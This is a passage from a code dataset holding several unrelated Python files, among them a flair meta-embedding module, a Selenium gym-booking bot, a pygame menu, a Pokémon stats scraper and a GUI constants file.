bool = False,\n use_attention: bool = False,\n use_features: bool = False,\n feature_model: FeatureEmbedding = None,\n use_mapping_bias: bool = True,\n use_fixed_weights_for_att: Union[bool, List[int]] = False,\n att_hidden_size: int = 10,\n max_mapping_dim: int = -1, \n use_batch_norm: bool = True,\n use_mapping_norm: bool = False):\n \"\"\"The constructor takes a list of embeddings to be combined.\"\"\"\n super().__init__()\n\n self.embeddings = embeddings\n self.num_embeddings = len(embeddings)\n self.embedding_names = []\n\n # IMPORTANT: add embeddings as torch modules\n for i, embedding in enumerate(embeddings):\n embedding.name = f\"{str(i)}-{embedding.name}\"\n self.embedding_names.append(embedding.name)\n 
self.add_module(f\"list_embedding_{str(i)}\", embedding)\n\n self.name: str = \"Meta\"\n self.use_average = use_average\n self.use_attention = use_attention\n self.use_features = use_features\n self.static_embeddings: bool = not self.use_average\n\n self.__embedding_type: str = embeddings[0].embedding_type\n\n self.map_all_embeddings = False\n if max_mapping_dim > 0:\n self.__embedding_length = max_mapping_dim\n if not use_average:\n self.map_all_embeddings = True # If concatenated embeddings are mapped to a smaller size\n \n elif self.use_average: \n self.__embedding_length = max([emb.embedding_length for emb in self.embeddings])\n else:\n self.__embedding_length = sum([emb.embedding_length for emb in self.embeddings])\n \n # Add Meta-Embedding models\n if self.use_average:\n self.embedding_mappings = []\n for emb in self.embeddings:\n inp_dim = emb.embedding_length\n out_dim = self.embedding_length\n l = torch.nn.Linear(inp_dim, out_dim, bias=use_mapping_bias)\n l.to(flair.device)\n self.embedding_mappings.append(l)\n self.embedding_mappings = torch.nn.ModuleList(self.embedding_mappings)\n elif self.map_all_embeddings:\n inp_dim = sum([emb.embedding_length for emb in self.embeddings])\n self.final_embedding_mapping = torch.nn.Linear(inp_dim, self.embedding_length, \n bias=use_mapping_bias).to(flair.device)\n \n self.use_batch_norm = use_batch_norm\n if use_batch_norm:\n self.batch_norm = torch.nn.BatchNorm1d(self.embedding_length)\n \n \n self.use_mapping_norm = use_mapping_norm\n if use_mapping_norm: \n self.embedding_norms = []\n for i in range(len(self.embeddings)):\n out_dim = self.embedding_length\n l = torch.nn.LayerNorm(out_dim)\n l.to(flair.device)\n self.embedding_norms.append(l)\n self.embedding_norms = torch.nn.ModuleList(self.embedding_norms)\n \n if self.use_features:\n self.feature_model = feature_model\n self.attention = EmbeddingAttention(self.embedding_length, feature_model.embedding_length, att_hidden_size, \n self.use_average, use_fixed_weights_for_att)\n \n elif self.use_attention:\n self.attention = EmbeddingAttention(self.embedding_length, 0, att_hidden_size, \n self.use_average, use_fixed_weights_for_att)\n \n \n self.to(flair.device)\n \n log_line(log)\n log.info(f'Meta-Embedding Configuration')\n log_line(log)\n log.info(\"Embeddings:\")\n for emb in self.embeddings:\n log.info(f' - {emb.name} ({emb.embedding_length})')\n log_line(log)\n log.info(\"Parameters:\")\n log.info(f' - static_embeddings: \"{self.static_embeddings}\"')\n log.info(f' - embedding_length: \"{self.embedding_length}\"')\n log.info(f' - use_average: \"{self.use_average}\"')\n log.info(f' - use_attention: \"{self.use_attention}\"')\n log.info(f' - use_features: \"{self.use_features}\"')\n log.info(f' - use_mapping_bias: \"{use_mapping_bias}\"')\n log.info(f' - att_hidden_size: \"{att_hidden_size}\"')\n log.info(f' - use_fixed_weights_for_att: \"{use_fixed_weights_for_att}\"')\n log.info(f' - use_batch_norm: \"{use_batch_norm}\"')\n log.info(f' - use_mapping_norm: \"{use_mapping_norm}\"')\n log.info(f' - map_all_embeddings: \"{self.map_all_embeddings}\"')\n log_line(log)\n \n def forward(self, \n sentences: Union[Sentence, List[Sentence]],\n return_mapped_embeddings: bool = False,\n return_weights: bool = False):\n #self.embed(sentences)\n \n if type(sentences) is Sentence:\n sentences = [sentences]\n\n lengths: List[int] = [len(sentence.tokens) for sentence in sentences]\n longest_token_sequence_in_batch: int = max(lengths)\n\n if self.use_average:\n emb_size = self.embedding_length * 
longest_token_sequence_in_batch * self.num_embeddings\n else:\n emb_size = self.embedding_length * longest_token_sequence_in_batch\n pre_allocated_zero_tensor = torch.zeros(\n emb_size,\n dtype=torch.float,\n device=flair.device,\n )\n\n all_embs: List[torch.Tensor] = list()\n for sentence in sentences:\n nb_padding_tokens = longest_token_sequence_in_batch - len(sentence)\n \n if self.use_average:\n for token in sentence:\n for i, emb in enumerate(token.get_each_embedding(self.embedding_names)):\n all_embs.append(self.embedding_mappings[i](emb))\n #all_embs.append(token_embs) \n \n if nb_padding_tokens > 0:\n t = pre_allocated_zero_tensor[\n : self.embedding_length * nb_padding_tokens * self.num_embeddings\n ]\n all_embs.append(t)\n \n elif self.map_all_embeddings: # for concatenation with mapping to smaller size\n for token in sentence:\n #torch.zeros(self.embedding_length * self.num_embeddings)\n token_embs: List[torch.Tensor] = list()\n for i, emb in enumerate(token.get_each_embedding(self.embedding_names)):\n token_embs.append(emb)\n token_embs = torch.cat(token_embs)\n token_embs = self.final_embedding_mapping(token_embs)\n all_embs.append(token_embs) \n \n if nb_padding_tokens > 0:\n t = pre_allocated_zero_tensor[\n : self.embedding_length * nb_padding_tokens\n ]\n all_embs.append(t)\n \n else: # for concatenation\n all_embs += [\n emb for token in sentence for emb in token.get_each_embedding(self.embedding_names)\n ]\n \n if nb_padding_tokens > 0:\n t = pre_allocated_zero_tensor[\n : self.embedding_length * nb_padding_tokens\n ]\n all_embs.append(t)\n\n if self.use_average:\n att_inp = torch.cat(all_embs).view(\n [\n len(sentences),\n longest_token_sequence_in_batch,\n self.num_embeddings,\n self.embedding_length,\n ]\n )\n \n if return_mapped_embeddings:\n mapped_embeddings = [t.squeeze(2) for t in torch.chunk(att_inp, self.num_embeddings, dim=2)]\n return mapped_embeddings\n \n if self.use_mapping_norm:\n mapped = [t.squeeze(2) for t in torch.chunk(att_inp, self.num_embeddings, dim=2)]\n normalized = [self.embedding_norms[i](emb) for i, emb in enumerate(mapped)]\n att_inp = torch.stack(normalized, dim=2)\n \n ## apply attention\n if self.use_features:\n feature_tensor = self.feature_model(sentences, (len(sentences), longest_token_sequence_in_batch))\n feature_tensor = feature_tensor.transpose_(0, 1)\n feature_inp = torch.stack([feature_tensor for x in range(self.num_embeddings)], dim=2)\n sentence_tensor, weights = self.attention(att_inp, feature_inp)\n elif self.use_attention:\n sentence_tensor, weights = self.attention(att_inp, None)\n else:\n sentence_tensor = torch.sum(att_inp, dim=2)\n \n if return_weights:\n return weights\n \n \n \n else: \n sentence_tensor = torch.cat(all_embs).view(\n [\n len(sentences),\n longest_token_sequence_in_batch,\n self.embedding_length,\n ]\n )\n \n if self.use_batch_norm and len(sentences) > 1:\n sentence_tensor = sentence_tensor.view(len(sentences) * longest_token_sequence_in_batch, self.embedding_length)\n sentence_tensor = self.batch_norm(sentence_tensor)\n sentence_tensor = sentence_tensor.view(len(sentences), longest_token_sequence_in_batch, self.embedding_length)\n \n return sentence_tensor\n\n def embed(\n self, sentences: Union[Sentence, List[Sentence]], static_embeddings: bool = True\n ):\n # if only one sentence is passed, convert to list of sentence\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n for embedding in self.embeddings:\n embedding.embed(sentences)\n \n self._add_embeddings_internal(sentences)\n\n def 
embed_internal_embeddings(\n self, sentences: Union[Sentence, List[Sentence]], static_embeddings: bool = True\n ):\n # if only one sentence is passed, convert to list of sentence\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n for embedding in self.embeddings:\n embedding.embed(sentences)\n\n @property\n def embedding_type(self) -> str:\n return self.__embedding_type\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n for embedding in self.embeddings:\n embedding._add_embeddings_internal(sentences)\n \n sentence_tensor = self.forward(sentences)\n for sid, sent in enumerate(sentences):\n for tid, token in enumerate(sent):\n token.set_embedding(self.name, sentence_tensor[sid][tid])\n\n return sentences\n \n def get_names(self) -> List[str]:\n \"\"\"Returns a list of embedding names. In most cases, it is just a list with one item, namely the name of\n this embedding. But in some cases, the embedding is made up by different embeddings (StackedEmbedding).\n Then, the list contains the names of all embeddings in the stack.\"\"\"\n return [self.name]\n\n def __str__(self):\n return f'MetaEmbeddings [{\",\".join([str(e) for e in self.embeddings])}]'\n\n def get_named_embeddings_dict(self) -> Dict:\n named_embeddings_dict = {}\n for embedding in self.embeddings:\n named_embeddings_dict.update(embedding.get_named_embeddings_dict())\n\n return named_embeddings_dict\n\n \nclass DocumentRNNEmbeddings(DocumentEmbeddings):\n def __init__(\n self,\n embeddings: List[TokenEmbeddings],\n hidden_size=128,\n rnn_layers=1,\n reproject_words: bool = False,\n reproject_words_dimension: int = None,\n bidirectional: bool = False,\n dropout: float = 0.5,\n word_dropout: float = 0.0,\n locked_dropout: float = 0.0,\n rnn_type=\"GRU\",\n fine_tune: bool = True,\n ):\n \"\"\"The constructor takes a list of embeddings to be combined.\n We changed the embeddings to support our MetaEmbeddings.\n :param embeddings: a list of token embeddings\n :param hidden_size: the number of hidden states in the rnn\n :param rnn_layers: the number of layers for the rnn\n :param reproject_words: boolean value, indicating whether to reproject the token embeddings in a separate linear\n layer before putting them into the rnn or not\n :param reproject_words_dimension: output dimension of reprojecting token embeddings. 
If None the same output\n dimension as before will be taken.\n :param bidirectional: boolean value, indicating whether to use a bidirectional rnn or not\n :param dropout: the dropout value to be used\n :param word_dropout: the word dropout value to be used, if 0.0 word dropout is not used\n :param locked_dropout: the locked dropout value to be used, if 0.0 locked dropout is not used\n :param rnn_type: 'GRU' or 'LSTM'\n \"\"\"\n super().__init__()\n\n #self.embeddings: StackedEmbeddings = StackedEmbeddings(embeddings=embeddings)\n self.embeddings = embeddings\n\n self.rnn_type = rnn_type\n\n self.reproject_words = reproject_words\n self.bidirectional = bidirectional\n\n self.length_of_all_token_embeddings: int = self.embeddings.embedding_length\n\n self.static_embeddings = False if fine_tune else True\n\n self.__embedding_length: int = hidden_size\n if self.bidirectional:\n self.__embedding_length *= 4\n\n self.embeddings_dimension: int = self.length_of_all_token_embeddings\n if self.reproject_words and reproject_words_dimension is not None:\n self.embeddings_dimension = reproject_words_dimension\n\n self.word_reprojection_map = torch.nn.Linear(\n self.length_of_all_token_embeddings, self.embeddings_dimension\n )\n\n # bidirectional RNN on top of embedding layer\n if rnn_type == \"LSTM\":\n self.rnn = torch.nn.LSTM(\n self.embeddings_dimension,\n hidden_size,\n num_layers=rnn_layers,\n bidirectional=self.bidirectional,\n batch_first=True,\n )\n else:\n self.rnn = torch.nn.GRU(\n self.embeddings_dimension,\n hidden_size,\n num_layers=rnn_layers,\n bidirectional=self.bidirectional,\n batch_first=True,\n )\n\n self.name = \"document_\" + self.rnn._get_name()\n\n # dropouts\n self.dropout = torch.nn.Dropout(dropout) if dropout > 0.0 else None\n self.locked_dropout = (\n LockedDropout(locked_dropout) if locked_dropout > 0.0 else None\n )\n self.word_dropout = WordDropout(word_dropout) if word_dropout > 0.0 else None\n\n torch.nn.init.xavier_uniform_(self.word_reprojection_map.weight)\n\n self.to(flair.device)\n\n self.eval()\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: Union[List[Sentence], Sentence]):\n \"\"\"Add embeddings to all sentences in the given list of sentences. 
If embeddings are already added, update\n only if embeddings are non-static.\"\"\"\n\n # TODO: remove in future versions\n if not hasattr(self, \"locked_dropout\"):\n self.locked_dropout = None\n if not hasattr(self, \"word_dropout\"):\n self.word_dropout = None\n\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n #self.rnn.zero_grad()\n\n # embed words in the sentence\n lengths: List[int] = [len(sentence.tokens) for sentence in sentences]\n longest_token_sequence_in_batch: int = max(lengths)\n \n self.embeddings.embed_internal_embeddings(sentences)\n sentence_tensor = self.embeddings(sentences)\n\n # before-RNN dropout\n if self.dropout:\n sentence_tensor = self.dropout(sentence_tensor)\n if self.locked_dropout:\n sentence_tensor = self.locked_dropout(sentence_tensor)\n if self.word_dropout:\n sentence_tensor = self.word_dropout(sentence_tensor)\n\n # reproject if set\n if self.reproject_words:\n sentence_tensor = self.word_reprojection_map(sentence_tensor)\n\n # push through RNN\n packed = pack_padded_sequence(\n sentence_tensor, lengths, enforce_sorted=False, batch_first=True\n )\n rnn_out, hidden = self.rnn(packed)\n outputs, output_lengths = pad_packed_sequence(rnn_out, batch_first=True)\n\n # after-RNN dropout\n if self.dropout:\n outputs = self.dropout(outputs)\n if self.locked_dropout:\n outputs = self.locked_dropout(outputs)\n\n # extract embeddings from RNN\n for sentence_no, length in enumerate(lengths):\n last_rep = outputs[sentence_no, length - 1]\n\n embedding = last_rep\n if self.bidirectional:\n first_rep = outputs[sentence_no, 0]\n embedding = torch.cat([first_rep, last_rep], 0)\n\n if self.static_embeddings:\n embedding = embedding.detach()\n\n sentence = sentences[sentence_no]\n sentence.set_embedding(self.name, embedding)\n\n def _apply(self, fn):\n\n # models that were serialized using torch versions older than 1.4.0 lack the _flat_weights_names attribute\n # check if this is the case and if so, set it\n for child_module in self.children():\n if isinstance(child_module, torch.nn.RNNBase) and not hasattr(child_module, \"_flat_weights_names\"):\n _flat_weights_names = []\n\n if child_module.__dict__[\"bidirectional\"]:\n num_direction = 2\n else:\n num_direction = 1\n for layer in range(child_module.__dict__[\"num_layers\"]):\n for direction in range(num_direction):\n suffix = \"_reverse\" if direction == 1 else \"\"\n param_names = [\"weight_ih_l{}{}\", \"weight_hh_l{}{}\"]\n if child_module.__dict__[\"bias\"]:\n param_names += [\"bias_ih_l{}{}\", \"bias_hh_l{}{}\"]\n param_names = [\n x.format(layer, suffix) for x in param_names\n ]\n _flat_weights_names.extend(param_names)\n\n setattr(child_module, \"_flat_weights_names\",\n _flat_weights_names)\n\n child_module._apply(fn)","repo_name":"boschresearch/adversarial_meta_embeddings","sub_path":"src/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":23189,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"70146171939","text":"import os\n\nimport cv2\nimport numpy as np\n\n\ndef merge(in_dir,out_dir):\n out_img=np.zeros((4088,3066,3),np.uint8)\n for i in reversed(range(11)):\n img_path=os.path.join(in_dir,\"cam0_block\"+str(i)+'.jpg')\n if not os.path.exists(img_path):\n continue\n img=cv2.imread(img_path)\n mask=img>20\n out_img[mask]=img[mask]\n 
cv2.imwrite(os.path.join(out_dir,\"{}.jpg\".format(i)),out_img)\n\nmerge(r'J:\\xuningli\\cross-view\\ns\\nerfstudio\\renders\\dortmund_blocks_2_16\\30k_vis',r'J:\\xuningli\\cross-view\\ns\\nerfstudio\\renders\\dortmund_blocks_2_16\\30k_vis\\new')\n","repo_name":"GDAOSU/MCT_NERF","sub_path":"mct/script/merge_block_img.py","file_name":"merge_block_img.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"73285361057","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.touch_actions import TouchActions\nfrom datetime import timedelta\nfrom datetime import datetime\nimport tkinter\n\nclass ArcBooker():\n\tdef __init__(self):\n\t\turl = \"https://getactive.gogaelsgo.com/Program/GetProducts?classification=b2e9f15b-dbaa-4f55-8bb3-6c1ca1c00e32\"\n\t\toptions = webdriver.ChromeOptions()\n\t\toptions.add_argument(\"--enable-javascript\")\n\t\toptions.add_argument(\"--headless\")\n\t\toptions.add_argument(\"--no-sandbox\")\n\t\tself.driver = webdriver.Chrome(chrome_options=options)\n\n\t\tself.driver.get(url)\n\t\tself.driver.execute_script(\"javascript:showLogin('/Program/GetProducts?classification=b2e9f15b-dbaa-4f55-8bb3-6c1ca1c00e32')\")\n\t\tprint(self.driver.current_url)\n\t\ttime.sleep(1)\n\t\tself.driver.find_element_by_css_selector(\"button.loginOption.btn.btn-lg.btn-block.btn-social.btn-soundcloud\").click()\n\t\tprint(self.driver.current_url)\n\t\ttime.sleep(2)\n\n\t\tusername_box = self.driver.find_element_by_id(\"username\")\n\t\tusername_box.send_keys(\"\") #Your Username\n\n\t\tpassword_box = self.driver.find_element_by_id(\"password\")\n\t\tpassword_box.send_keys(\"\") #Your password\n\n\t\tself.driver.find_element_by_xpath(\"//*[@id='qw-region-content-inner']/div/form/div[3]/button\").click()\n\t\ttime.sleep(1)\n\t\tprint(self.driver.current_url)\n\n\t\tworkoutZones = self.driver.find_elements_by_css_selector(\"h4.TitleText-SP\")\n\t\tfor zone in workoutZones:\n\t\t\tprint(zone.text)\n\t\t\tif zone.text == \"L2 Conditioning Zone - Dumbbell Free Weights\": #Preferred workout zone\n\t\t\t\tprint(\"Correct zone found\")\n\t\t\t\tzone.click()\n\t\t\t\tbreak\n\n\t\tbookDate = str(datetime.date(datetime.now()+timedelta(days=3))) + \" 08:30:00\" #Preferred workout time\n\n\t\tprint(\"Attempting to book on \" + bookDate)\n\n\t\ttime_slots = self.driver.find_elements_by_css_selector(\"button.btn.btn-primary.pull-left\")\n\t\tprint(\"There are \" + str(len(time_slots)) + \" timeslots\")\n\t\tisFound = False\n\t\tfor time_slot in time_slots:\n\t\t\tinfo = time_slot.get_attribute(\"onClick\")\n\t\t\tsplitInfo = info.split(\"'\")\n\t\t\tcheckIn = str(datetime.strptime(splitInfo[7], '%m/%d/%Y %I:%M:%S %p'))\n\t\t\tcheckOut = str(datetime.strptime(splitInfo[9], '%m/%d/%Y %I:%M:%S %p'))\n\t\t\tprint(\"From \" + checkIn + \" to \" + checkOut)\n\t\t\tif checkIn == bookDate:\n\t\t\t\tprint(\"Prefered time available, booking now\")\n\t\t\t\ttime_slot.click()\n\t\t\t\ttime.sleep(1)\n\t\t\t\tself.driver.find_element_by_xpath(\"//*[@id='btnAccept']\").click()\n\t\t\t\tself.driver.find_element_by_xpath(\"//*[@id='checkoutButton']\")\n\t\t\t\tisFound = True\n\t\t\t\tbreak\n\t\t\n\t\tif not isFound:\n\t\t\tprint(\"Time not found please try another\")\n\t\t\t\n\nif __name__ == \"__main__\":\n\tr = 
ArcBooker()","repo_name":"trombonee/ArcBooker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19878132259","text":"import pygame\r\nimport sprites\r\n\r\n\r\n\r\ndef level(game):\r\n main_button = sprites.Button(400, 640, 'Main menu', game.middle_font)\r\n hard_button = sprites.Button(400, 480, 'Hard', game.middle_font)\r\n medium_button = sprites.Button(400, 400, 'Medium', game.middle_font)\r\n easy_button = sprites.Button(400, 320, 'Easy', game.middle_font)\r\n\r\n menu_run = True\r\n while menu_run:\r\n\r\n pos = pygame.mouse.get_pos()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n return False\r\n if event.type == pygame.KEYDOWN:\r\n return 350\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if main_button.be_inside(pos[0], pos[1]):\r\n return 350\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if hard_button.be_inside(pos[0], pos[1]):\r\n return 30\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if medium_button.be_inside(pos[0], pos[1]):\r\n return 80\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if easy_button.be_inside(pos[0], pos[1]):\r\n return 150\r\n\r\n main_button.update(pos[0], pos[1])\r\n hard_button.updatel(pos[0], pos[1])\r\n medium_button.updatel(pos[0], pos[1])\r\n easy_button.updatel(pos[0], pos[1])\r\n\r\n game.screen.fill((127, 255, 212))\r\n game.draw_overlay()\r\n \r\n\r\n game.screen.blit(main_button.image, main_button.rect)\r\n game.screen.blit(hard_button.image, hard_button.rect)\r\n game.screen.blit(medium_button.image, medium_button.rect)\r\n game.screen.blit(easy_button.image, easy_button.rect)\r\n pygame.display.flip()\r\n\r\n game.clock.tick(20)\r\n","repo_name":"anastaysha15/amorba3","sub_path":"level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25291060549","text":"import argparse\nimport json\nimport logging\nimport bs4\nimport requests\n\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger(__name__)\n\nOUTPUT_FILE = 'pokemon.json'\n\nPARSER = argparse.ArgumentParser(description='A Pokémon web scraper')\nPARSER.add_argument('-s', '--save', action='store_true',\n help='save the output to JSON')\nPARSER.add_argument('-f', '--first', default=1, type=int,\n help='the number of the first Pokémon to retrieve')\nPARSER.add_argument('-l', '--last', default=1, type=int,\n help='the number of the last Pokémon to retrieve')\nPARSER.add_argument('-v', '--verbose', action='store_true',\n help='print the Pokémon\\'s statistics to console')\nARGS = PARSER.parse_args()\n\n\ndef get_pokemon_data(urls):\n \"\"\"\n Scrape Pokémon data from Serebii.net and output to console.\n :param urls: URLs to extract the data from.\n \"\"\"\n pokemon_list = []\n\n for url in urls:\n LOGGER.info('Extracting data from Serebii.net')\n data = requests.get(url)\n soup = bs4.BeautifulSoup(data.text, 'html.parser')\n try:\n all_divs = soup.find_all('div', attrs={'align': 'center'})\n center_panel_info = all_divs[1].findAll('td', {'class': 'fooinfo'})\n except Exception:\n LOGGER.error(\n 'There was an error trying to identify HTML elements on the webpage.')\n raise\n\n pokemon = dict()\n pokemon['name'] = center_panel_info[1].text\n pokemon['number'] = center_panel_info[3].text\n pokemon['classification'] = center_panel_info[4].text\n pokemon['height'] = 
(center_panel_info[5].text).split('\\r\\n\\t\\t\\t')\n pokemon['weight'] = (center_panel_info[6].text).split('\\r\\n\\t\\t\\t')\n\n try:\n base_stats_table = soup.find(\n 'a', attrs={'name': 'stats'}).find_next('table')\n base_stats_td = base_stats_table.findAll('td')\n except Exception:\n LOGGER.error(\n 'There was an error trying to identify HTML elements on the webpage.')\n raise\n\n pokemon['hit_points'] = int(base_stats_td[8].text)\n pokemon['attack'] = int(base_stats_td[9].text)\n pokemon['defense'] = int(base_stats_td[10].text)\n pokemon['special'] = int(base_stats_td[11].text)\n pokemon['speed'] = int(base_stats_td[12].text)\n\n if not ARGS.save or ARGS.verbose:\n print_pokemon_data(pokemon)\n LOGGER.info('Adding %s %s to dataset',\n pokemon['number'], pokemon['name'])\n pokemon_list.append(pokemon)\n\n if ARGS.save:\n LOGGER.info('Saving to %s', OUTPUT_FILE)\n save_to_json(pokemon_list)\n else:\n LOGGER.info(\n 'All Pokémon retrieved! To save to JSON, use the --save flag')\n\n\ndef save_to_json(pokemon_list):\n \"\"\"\n Save Pokémon array to JSON file.\n :param pokemon_list: Array of Pokémon data.\n \"\"\"\n with open(OUTPUT_FILE, mode='w', encoding='utf-8') as output_file:\n json.dump(pokemon_list, output_file, indent=4)\n\n\ndef print_pokemon_data(pokemon):\n \"\"\"\n Print formatted Pokémon data.\n :param pokemon: Pokémon object containing statistics.\n \"\"\"\n print('Name\\t\\t', pokemon['name'])\n print('Number\\t\\t', pokemon['number'])\n print('Classification\\t', pokemon['classification'])\n print('Height\\t\\t', ' '.join(str(i) for i in pokemon['height']))\n print('Weight\\t\\t', ' '.join(str(i) for i in pokemon['weight']))\n print('HP\\t\\t', pokemon['hit_points'])\n print('Attack\\t\\t', pokemon['attack'])\n print('Defense\\t\\t', pokemon['defense'])\n print('Special\\t\\t', pokemon['special'])\n print('Speed\\t\\t', pokemon['speed'])\n\n\nif __name__ == '__main__':\n try:\n URLS = ['https://serebii.net/pokedex/{}.shtml'.format(str(x).zfill(3))\n for x in range(ARGS.first, ARGS.last + 1)]\n get_pokemon_data(URLS)\n except Exception as ex:\n LOGGER.error(ex)\n raise\n\n\ndef function_desfase(tabla, tipo):\n tabla = tabla.withColumn(\n \"gf_default_type\",\n f.when(\n (f.col(\"gf_basel_criteria_ent_st_type\") == \"M\")\n & (f.col(\"gf_default_type\") != \"S\")\n & dates_after_default(),\n \"R\",\n ).otherwise(f.col(\"gf_default_type\")),\n )\n tabla = tabla.withColumn(\n \"gf_ope_default_days_number\",\n f.when(\n notmissing(\"gf_ope_default_days_number\") & dates_after_default(),\n f.greatest(\n f.lit(0), f.col(\"gf_ope_default_days_number\") - f.col(\"desfase\")\n ),\n ).otherwise(f.col(\"gf_ope_default_days_number\")),\n )\n tabla = tabla.withColumn(\n \"gf_cust_default_days_number\",\n f.when(\n notmissing(\"gf_cust_default_days_number\") & dates_after_default(),\n f.greatest(\n f.lit(0), f.col(\"gf_cust_default_days_number\") - f.col(\"desfase\")\n ),\n ).otherwise(f.col(\"gf_cust_default_days_number\")),\n )\n tabla = tabla.withColumn(\n \"gf_elapsed_term_number\",\n f.when(\n notmissing(\"gf_elapsed_term_number\") & dates_after_default(),\n f.greatest(f.lit(0), f.col(\"gf_elapsed_term_number\") - f.col(\"desfase\")),\n ).otherwise(f.col(\"gf_elapsed_term_number\")),\n )\n if tipo == \"mayorista\":\n tabla = tabla.withColumn(\n \"gf_resdl_trm_title_days_number\",\n f.when(\n notmissing(\"gf_resdl_trm_title_days_number\") & dates_after_default(),\n f.greatest(\n f.lit(0), f.col(\"gf_resdl_trm_title_days_number\") + f.col(\"desfase\")\n ),\n 
).otherwise(f.col(\"gf_resdl_trm_title_days_number\")),\n )\n tabla = tabla.withColumn(\n \"gf_cont_residual_term_number\",\n f.when(\n notmissing(\"gf_cont_residual_term_number\") & dates_after_default(),\n f.greatest(\n f.lit(0), f.col(\"gf_cont_residual_term_number\") + f.col(\"desfase\")\n ),\n ).otherwise(f.col(\"gf_cont_residual_term_number\")),\n )\n # prioridad 2\n tabla = (\n tabla.withColumn(\n \"gf_basel_criteria_ent_st_type\",\n f.when(prioridad2() & dates_after_default(), \"M\").otherwise(\n f.col(\"gf_basel_criteria_ent_st_type\")\n ),\n )\n .withColumn(\n \"gf_default_type\",\n f.when(prioridad2() & dates_after_default(), \"R\").otherwise(\n f.col(\"gf_default_type\")\n ),\n )\n .withColumn(\n \"gf_cust_default_days_number\",\n f.when(\n prioridad2() & dates_after_default(),\n f.months_between(\n f.lit(f.col(tp_tipo[tipo][\"exit\"])),\n f.lit(f.col(\"gf_init_default_date\")),\n )\n / 12,\n ).otherwise(f.col(\"gf_cust_default_days_number\")),\n )\n .withColumn(\n \"gf_ope_default_days_number\",\n f.when(\n prioridad2() & dates_after_default(),\n f.least(\n f.col(\"gf_cust_default_days_number\"),\n f.col(\"gf_elapsed_term_number\"),\n ),\n )\n .otherwise(\"gf_ope_default_days_number\")\n )\n )\n return tabla\n\n","repo_name":"mchoque93/pokemon","sub_path":"scaper.py","file_name":"scaper.py","file_ext":"py","file_size_in_byte":7371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5146169722","text":" # This program is free software: you can redistribute it and/or modify\n # it under the terms of the GNU General Public License as published by\n # the Free Software Foundation, either version 3 of the License, or\n # (at your option) any later version.\n\n # This program is distributed in the hope that it will be useful,\n # but WITHOUT ANY WARRANTY; without even the implied warranty of\n # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n # GNU General Public License for more details.\n\n # You should have received a copy of the GNU General Public License\n # along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n \nimport sys\nimport os.path\n\nif os.path.isfile(os.path.join('..', 'ui', 'main.ui')):\n    DIR_PREFIX = '..'\n    DIR_UI = os.path.join(DIR_PREFIX, 'ui')\n    DIR_CFG = os.path.join(DIR_PREFIX, 'config')\n    DIR_ICON = os.path.join(DIR_PREFIX, 'icons')\nelse:\n    DIR_PREFIX = os.path.join(os.path.expanduser('~'),'.local','KvFront')\n    DIR_UI = os.path.join(DIR_PREFIX, 'ui')\n    DIR_CFG = os.path.join(DIR_PREFIX, 'config')\n\n    DIR_PREFIX2 = os.path.join(os.path.expanduser('~'),'.local','share')\n    DIR_ICON = os.path.join(DIR_PREFIX2, 'icons')\n    \n    print(\"DIR_UI:\" + DIR_UI)\n    print(\"DIR_CFG:\" + DIR_CFG)\n    print(\"DIR_ICON:\" + DIR_ICON)\n\n\nFILE_UI_MAIN = os.path.join(DIR_UI, 'main.ui')\nFILE_UI_ADDSERVER = os.path.join(DIR_UI, 'addserver.ui')\nFILE_UI_NEWREDISKEY = os.path.join(DIR_UI, 'newrediskey.ui')\nFILE_UI_NEWMEMKEY = os.path.join(DIR_UI, 'newmemkey.ui')\nFILE_UI_DETAILPAGE = os.path.join(DIR_UI, 'detailpage-2.ui')\nFILE_UI_DETAILPAGE4REDIS = os.path.join(DIR_UI, 'detailpage4redis-2.ui')\nFILE_SERVER_CFG = os.path.join(DIR_CFG, 'server.conf')\n","repo_name":"wgalaxy/KvFront","sub_path":"KvFront/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"}
{"seq_id":"40805837387","text":"import string\nfrom operator import itemgetter\n\n# This entire script will be moved into a function to be called by another script.\n# This other script will import the newest tweets into an array then remove all dupes\n# from the array. This shortened array will be passed to the strip function. The\n# stripped array will then be appended to the cache.\n\n# These are the 100 most commonly used words in English according to Wikipedia.\nremovedWords = 